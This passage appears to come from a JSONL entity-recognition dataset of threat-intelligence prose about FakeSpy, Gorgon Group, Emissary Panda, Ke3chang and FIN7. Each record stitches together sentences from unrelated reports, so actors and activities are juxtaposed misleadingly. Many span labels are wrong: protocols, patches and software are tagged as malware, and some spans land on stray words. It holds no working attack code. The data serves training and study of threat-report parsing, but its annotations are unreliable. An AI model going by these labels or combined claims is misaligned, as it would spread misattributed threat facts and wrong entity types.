Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 357, "end": 377, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 583, "end": 602, "label": "Organization"}]} {"text": "WAKE_LOCK - Allows the application to use PowerManager WakeLocks to keep the processor from sleeping or the screen from dimming . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike \u2013 a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors \u2013 which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": [{"start": 132, "end": 140, "label": "Organization"}, {"start": 186, "end": 199, "label": "System"}, {"start": 525, "end": 530, "label": "Malware"}, {"start": 553, "end": 565, "label": "Organization"}]} {"text": "ACCESS_NETWORK_STATE - Allows the application to access information about networks . However , this action doesn\u2019t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . 
As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": [{"start": 329, "end": 341, "label": "Organization"}, {"start": 384, "end": 410, "label": "Organization"}]} {"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - Whitelists the application to allow it to ignore battery optimizations . Bitdefender\u2019s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank\u2019s employees . Starting in mid-February .", "spans": [{"start": 112, "end": 125, "label": "Organization"}, {"start": 268, "end": 274, "label": "Organization"}]} {"text": "READ_CONTACTS - Allows the application to read the user 's contacts data . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 170, "end": 179, "label": "Organization"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 359, "end": 380, "label": "Malware"}]} {"text": "FakeSpy package permissions . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . 
Unit 42 researchers have been tracking an active campaign .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 30, "end": 33, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}]} {"text": "On opening the app , two pop-up messages appear on screen : Change SMS App : This sets permissions to intercept every SMS received on the device and send a copy of these messages to the C2 server . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 248, "end": 255, "label": "Organization"}, {"start": 447, "end": 453, "label": "System"}, {"start": 459, "end": 483, "label": "Indicator"}, {"start": 495, "end": 508, "label": "Vulnerability"}]} {"text": "Ignore Battery Optimization : This sets permissions to continue to operate at full capacity while the phone 's screen is turned off and the phone locked . The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": [{"start": 159, "end": 165, "label": "Organization"}, {"start": 279, "end": 298, "label": "System"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 496, "end": 515, "label": "Organization"}]} {"text": "These requests rely on the end user accepting the permission changes and points to the importance of healthy skepticism when giving applications permissions . 
We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": [{"start": 170, "end": 184, "label": "Organization"}, {"start": 214, "end": 227, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 404, "end": 416, "label": "Organization"}, {"start": 458, "end": 484, "label": "Malware"}, {"start": 489, "end": 504, "label": "Malware"}, {"start": 529, "end": 541, "label": "Organization"}]} {"text": "FakeSpy Chunghwa Post version installation process and application UI . Bitdefender\u2019s investigation shows the attackers\u2019 main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee\u2019s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 21, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 340, "end": 362, "label": "Organization"}, {"start": 366, "end": 378, "label": "Organization"}, {"start": 441, "end": 453, "label": "Organization"}]} {"text": "DYNAMIC LIBRARY LOADING Once the application has finished the installation process , the malware starts its real malicious activity . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . 
Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks .", "spans": [{"start": 152, "end": 174, "label": "System"}, {"start": 235, "end": 249, "label": "Organization"}, {"start": 265, "end": 277, "label": "Organization"}]} {"text": "The malicious application da.hao.pao.bin ( Chunghwa Post ) loads a library file libmsy.so used to execute the packed mycode.jar file . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": [{"start": 26, "end": 40, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Organization"}, {"start": 80, "end": 89, "label": "Indicator"}, {"start": 117, "end": 132, "label": "Indicator"}, {"start": 210, "end": 223, "label": "Vulnerability"}, {"start": 400, "end": 412, "label": "Organization"}]} {"text": "The JAR file is the decrypted version of the file tong.luo , which is located in the assets folder . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": [{"start": 50, "end": 58, "label": "Indicator"}, {"start": 319, "end": 333, "label": "Organization"}, {"start": 360, "end": 384, "label": "Organization"}, {"start": 436, "end": 451, "label": "Malware"}]} {"text": "Decompiled APK resources . 
This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": [{"start": 300, "end": 313, "label": "Malware"}, {"start": 314, "end": 324, "label": "Indicator"}, {"start": 394, "end": 402, "label": "Organization"}]} {"text": "By comparing the sizes of the encrypted asset file tong.luo vs the decrypted JAR file mycode.jar , it is interesting to note that it is the same file ( almost the same size ) . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": [{"start": 51, "end": 59, "label": "Indicator"}, {"start": 86, "end": 96, "label": "Indicator"}, {"start": 468, "end": 480, "label": "Organization"}]} {"text": "Comparing encrypted vs decrypted asset file . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . 
This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics .", "spans": [{"start": 121, "end": 134, "label": "Vulnerability"}, {"start": 187, "end": 208, "label": "Organization"}, {"start": 217, "end": 232, "label": "Organization"}, {"start": 378, "end": 384, "label": "Malware"}, {"start": 413, "end": 437, "label": "Indicator"}]} {"text": "After libmsy.so decrypts the asset file tong.luo , it loads mycode.jar dynamically into FakeSpy \u2019 s process , as is shown from the output of the \u201c adb logcat \u201d command . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 40, "end": 48, "label": "Indicator"}, {"start": 60, "end": 70, "label": "Indicator"}, {"start": 88, "end": 95, "label": "Malware"}, {"start": 261, "end": 274, "label": "Organization"}]} {"text": "Logcat logs show FakeSpy uses libmsy.so to execute the malicious packed mycode.jar file . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . 
Several additional documents surfaced between January 17 and February 3 .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 30, "end": 39, "label": "Indicator"}, {"start": 72, "end": 87, "label": "Indicator"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 153, "end": 161, "label": "System"}, {"start": 196, "end": 210, "label": "Organization"}]} {"text": "By analyzing running processes on the infected device , it shows that the malware creates a child process of itself to perform the multi-process ptrace anti-debugging technique . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . All contain the same Visual Basic macro code and author name as Honeybee .", "spans": [{"start": 229, "end": 235, "label": "Organization"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 304, "end": 326, "label": "System"}, {"start": 393, "end": 401, "label": "Organization"}]} {"text": "FakeSpy uses an anti-debugging technique by creating another child process of itself . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . Some of the malicious documents were test files without the implant .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 175, "end": 189, "label": "Organization"}, {"start": 233, "end": 257, "label": "Organization"}, {"start": 297, "end": 307, "label": "Malware"}]} {"text": "By performing a deep analysis of the malware , we were able to extract the unpacked JAR file mycode.jar and reveal some very interesting code . 
We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": [{"start": 93, "end": 103, "label": "Indicator"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 186, "end": 203, "label": "System"}, {"start": 348, "end": 362, "label": "Organization"}, {"start": 394, "end": 402, "label": "Organization"}]} {"text": "STEALING SENSITIVE INFORMATION FakeSpy has multiple built in information stealing capabilities . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}, {"start": 200, "end": 214, "label": "Organization"}, {"start": 240, "end": 248, "label": "Organization"}]} {"text": "The first function is used for contact information stealing : the function upCon steals all contacts in the contact list and their information . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . 
Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": [{"start": 244, "end": 253, "label": "Malware"}, {"start": 295, "end": 308, "label": "Vulnerability"}, {"start": 334, "end": 342, "label": "Malware"}, {"start": 343, "end": 355, "label": "Malware"}, {"start": 440, "end": 446, "label": "Malware"}, {"start": 467, "end": 477, "label": "Malware"}, {"start": 480, "end": 488, "label": "Organization"}]} {"text": "Then , it sends it to the C2 server using the URL that ends with /servlet/ContactUpload . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": [{"start": 65, "end": 87, "label": "Indicator"}, {"start": 158, "end": 171, "label": "Malware"}, {"start": 243, "end": 256, "label": "Malware"}, {"start": 259, "end": 290, "label": "Organization"}, {"start": 461, "end": 476, "label": "Malware"}]} {"text": "The stolen data fields are : Mobile - The infected device phone number and contact \u2019 s phone number Contacts - A headline used for the attacker to distinguish between the type of stolen information he gets Name - Contact \u2019 s full name ( Display name ) upCon ( upload contact ) function used for stealing contact list information . We will provide an analysis of the HyperBro tool in an upcoming section . Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": [{"start": 331, "end": 333, "label": "Organization"}, {"start": 366, "end": 374, "label": "Malware"}]} {"text": "For testing purposes we inserted a fake contacts list to our Android Emulator and observed resultant behavior . 
However , using NCC Group\u2019s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 128, "end": 131, "label": "Organization"}, {"start": 289, "end": 292, "label": "Organization"}, {"start": 322, "end": 336, "label": "Organization"}, {"start": 383, "end": 390, "label": "Organization"}, {"start": 464, "end": 472, "label": "Organization"}]} {"text": "Exfiltrated contact list data sent to the C2 server . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": [{"start": 85, "end": 95, "label": "System"}, {"start": 106, "end": 114, "label": "System"}, {"start": 159, "end": 173, "label": "System"}, {"start": 276, "end": 283, "label": "Organization"}, {"start": 345, "end": 353, "label": "Organization"}]} {"text": "The second stealing function is the onStartCommand , which steals infected device data and additional information . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . 
We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": [{"start": 295, "end": 303, "label": "Organization"}, {"start": 304, "end": 313, "label": "Organization"}]} {"text": "The stolen data is sent to the C2 server using the URL ending with /servlet/xx . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": [{"start": 67, "end": 78, "label": "Indicator"}, {"start": 126, "end": 138, "label": "Malware"}, {"start": 151, "end": 170, "label": "Malware"}, {"start": 287, "end": 296, "label": "System"}, {"start": 316, "end": 330, "label": "Organization"}, {"start": 342, "end": 349, "label": "Organization"}, {"start": 389, "end": 408, "label": "System"}, {"start": 411, "end": 414, "label": "System"}, {"start": 441, "end": 455, "label": "Organization"}]} {"text": "The stolen data fields are : Mobile - The infected device phone number Machine - The device model ( in our example : Google Pixel 2 ) Sversion - The OS version Bank - Checks if there are any banking-related or cryptocurrency trading apps Provider - The telecommunication provider ( IMSI value in device settings ) npki - Checks if the folder named NPKI ( National Public Key Infrastructure ) might contain authentication certificates related to financial transactions onStartCommand function for stealing device information and additional sensitive data . 
The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and Exfiltration .", "spans": [{"start": 117, "end": 131, "label": "System"}, {"start": 560, "end": 574, "label": "Organization"}, {"start": 599, "end": 612, "label": "System"}, {"start": 820, "end": 833, "label": "Vulnerability"}]} {"text": "Exfiltrated device information and additional sensitive data sent to the C2 server . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . The Ke3chang attackers have been active since at least 2010 .", "spans": [{"start": 148, "end": 161, "label": "System"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 279, "end": 288, "label": "Malware"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 313, "end": 322, "label": "Organization"}]} {"text": "FakeSpy asks to be the default SMS app because it uses the function onReceive to intercept incoming SMS messages . According to Microsoft\u2019s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . 
traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 128, "end": 139, "label": "Organization"}, {"start": 287, "end": 296, "label": "Organization"}, {"start": 299, "end": 305, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 321, "end": 330, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}, {"start": 359, "end": 368, "label": "Organization"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 387, "end": 401, "label": "Organization"}]} {"text": "It saves the messages \u2019 metadata and content , filters the information by fields , and sends them to the C2 server using the URL /servlet/SendMassage2 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": [{"start": 129, "end": 150, "label": "Indicator"}, {"start": 168, "end": 174, "label": "Organization"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 423, "end": 432, "label": "Organization"}, {"start": 435, "end": 441, "label": "Organization"}, {"start": 444, "end": 454, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 469, "end": 488, "label": "Organization"}, {"start": 491, "end": 500, "label": "Organization"}, {"start": 503, "end": 516, "label": "Organization"}, {"start": 519, "end": 533, "label": "Organization"}]} {"text": "The fields it collects are : Mobile - The phone number which sent the SMS Content - The message body Sender - The contact name who sent the message Time - The time the message was received onReceive function used to intercept incoming SMS messages . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": [{"start": 318, "end": 322, "label": "Organization"}, {"start": 328, "end": 341, "label": "System"}, {"start": 510, "end": 517, "label": "Organization"}, {"start": 586, "end": 594, "label": "Organization"}, {"start": 595, "end": 604, "label": "Organization"}]} {"text": "The malware uses the function sendAll to send messages that spread the malware to other devices . 
We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": [{"start": 115, "end": 129, "label": "Organization"}]} {"text": "It sends a smishing message to the entire contact list of the infected device along with the malicious link to the FakeSpy installation page . Consequently , the Linux malware ecosystem is plagued by financially driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . Ke3chang attackers have used spear-phishing emails .", "spans": [{"start": 115, "end": 122, "label": "Malware"}, {"start": 200, "end": 211, "label": "Organization"}, {"start": 275, "end": 293, "label": "Organization"}, {"start": 296, "end": 304, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 340, "end": 346, "label": "System"}]} {"text": "sendAll function used to spread malicious messages to the contact list . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . 
Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 94, "end": 100, "label": "Organization"}, {"start": 172, "end": 184, "label": "System"}, {"start": 220, "end": 237, "label": "System"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 336, "end": 340, "label": "System"}, {"start": 341, "end": 349, "label": "Vulnerability"}, {"start": 366, "end": 379, "label": "Vulnerability"}, {"start": 425, "end": 439, "label": "Indicator"}, {"start": 442, "end": 455, "label": "Vulnerability"}, {"start": 462, "end": 478, "label": "Malware"}, {"start": 481, "end": 494, "label": "Vulnerability"}]} {"text": "Another interesting feature in FakeSpy \u2019 s code is the collection of the device 's IMEI ( International Mobile Station Equipment Identity ) number and all installed applications using the function upAppinfos . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 210, "end": 212, "label": "Organization"}, {"start": 348, "end": 356, "label": "Organization"}, {"start": 357, "end": 366, "label": "Organization"}, {"start": 392, "end": 398, "label": "System"}]} {"text": "It sends all of this data to the C2 server using the URL ending with /servlet/AppInfos . The group\u2019s implants are characterized by the employment of information-stealing tools , among them screenshot and document stealers delivered via an SFX , and made to achieve persistence through a scheduled task . 
Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": [{"start": 69, "end": 86, "label": "Indicator"}, {"start": 93, "end": 100, "label": "Organization"}, {"start": 161, "end": 175, "label": "System"}, {"start": 204, "end": 221, "label": "System"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 334, "end": 343, "label": "Organization"}, {"start": 394, "end": 400, "label": "Malware"}, {"start": 407, "end": 410, "label": "Malware"}, {"start": 421, "end": 426, "label": "Malware"}]} {"text": "upAppinfos function used for obtaining the device IMEI and all of its installed applications . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . It is a typical first-stage backdoor commonly found in APT attacks .", "spans": [{"start": 118, "end": 127, "label": "System"}, {"start": 181, "end": 196, "label": "Organization"}]} {"text": "FakeSpy is able to check the network connectivity status by using the function isNetworkAvailable . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . 
The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 100, "end": 104, "label": "Organization"}, {"start": 234, "end": 243, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 340, "end": 346, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 374, "end": 393, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 412, "end": 425, "label": "Organization"}, {"start": 428, "end": 442, "label": "Organization"}]} {"text": "What makes this function more suspicious is the two strings written in Chinese characters : ===\u72b6\u6001=== ( ===Status=== ) - Checks whether the device is connected to a network ; ===\u7c7b\u578b=== ( ===Type=== ) - Checks whether the device sees available nearby Wifi networks . isNetworkAvailable function used for monitoring network connectivity status . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . All of the CnC communications are performed over the HTTP protocol .", "spans": [{"start": 346, "end": 350, "label": "Organization"}, {"start": 489, "end": 502, "label": "Malware"}]} {"text": "ANTI-EMULATOR TECHNIQUES FakeSpy appears to use multiple techniques to evade detection via the emulator . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . 
The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 147, "end": 149, "label": "Organization"}, {"start": 191, "end": 206, "label": "Organization"}, {"start": 240, "end": 244, "label": "Organization"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 327, "end": 334, "label": "Malware"}, {"start": 385, "end": 388, "label": "Malware"}, {"start": 407, "end": 412, "label": "Malware"}, {"start": 413, "end": 420, "label": "Malware"}]} {"text": "It shows that the malware can detect whether it \u2019 s running in an emulated environment or a real mobile device , and can change its code pattern accordingly . In 2018-2019 , researchers of Kaspersky Lab\u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": [{"start": 189, "end": 198, "label": "Organization"}, {"start": 337, "end": 341, "label": "Organization"}, {"start": 389, "end": 401, "label": "Organization"}, {"start": 527, "end": 543, "label": "Malware"}]} {"text": "The first example of this is in the onStart function , where the malware looks for the string \u201c Emulator \u201d and an x86 processor model . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email HackOrges , leading us to think that more than 130 companies had been targeted by the end of 2018 . 
Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" .", "spans": [{"start": 163, "end": 167, "label": "Organization"}, {"start": 388, "end": 395, "label": "Organization"}]} {"text": "Anti-emulator code . Interestingly , following some open-source publications about them , the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit , which they employed during the summer of 2018 . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": [{"start": 94, "end": 98, "label": "Organization"}, {"start": 154, "end": 180, "label": "System"}, {"start": 285, "end": 296, "label": "Organization"}, {"start": 305, "end": 312, "label": "Organization"}, {"start": 327, "end": 335, "label": "Organization"}]} {"text": "In order to simulate this technique , we took two videos side by side of how FakeSpy ( the Royal Mail sample ) behaves differently on a physical device versus an emulator . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 .", "spans": [{"start": 77, "end": 84, "label": "Malware"}, {"start": 91, "end": 101, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 379, "end": 387, "label": "Organization"}, {"start": 388, "end": 397, "label": "Organization"}, {"start": 415, "end": 420, "label": "Malware"}]} {"text": "FakeSpy behavior on physical device vs emulator ( anti-emulator ) . The new GRIFFON implant is written to the hard drive before each execution , limiting the \u201c file-less \u201d aspect of this method . 
The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 76, "end": 83, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 234, "end": 239, "label": "Malware"}, {"start": 240, "end": 247, "label": "Malware"}]} {"text": "This simulation shows that FakeSpy behaves differently on a physical device versus an emulator . Given FIN7\u2019s previous use of false security companies , we decided to look deeper into this one . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": [{"start": 27, "end": 34, "label": "Malware"}, {"start": 103, "end": 109, "label": "Organization"}, {"start": 132, "end": 150, "label": "Organization"}, {"start": 282, "end": 311, "label": "Organization"}, {"start": 324, "end": 331, "label": "Organization"}, {"start": 352, "end": 360, "label": "Organization"}]} {"text": "When executed the second time by clicking on the app on the physical device , FakeSpy redirects to the app settings . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . 
The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": [{"start": 78, "end": 85, "label": "Malware"}, {"start": 123, "end": 139, "label": "Organization"}, {"start": 148, "end": 157, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 274, "end": 290, "label": "Organization"}, {"start": 316, "end": 328, "label": "Malware"}, {"start": 334, "end": 341, "label": "Organization"}]} {"text": "In contrast , on the emulator , a toast message is displayed that shows \u201c Install completed \u201d , at which point FakeSpy removes its shortcut from the device 's homescreen . FIN7\u2019s last campaigns were targeting banks in Europe and Central America . At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": [{"start": 111, "end": 118, "label": "Malware"}, {"start": 172, "end": 178, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}]} {"text": "Another example of FakeSpy \u2019 s anti-emulation techniques is how it uses the getMachine function , which uses the TelephonyManager class to check for the deviceID , phone number , IMEI , and IMSI . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . 
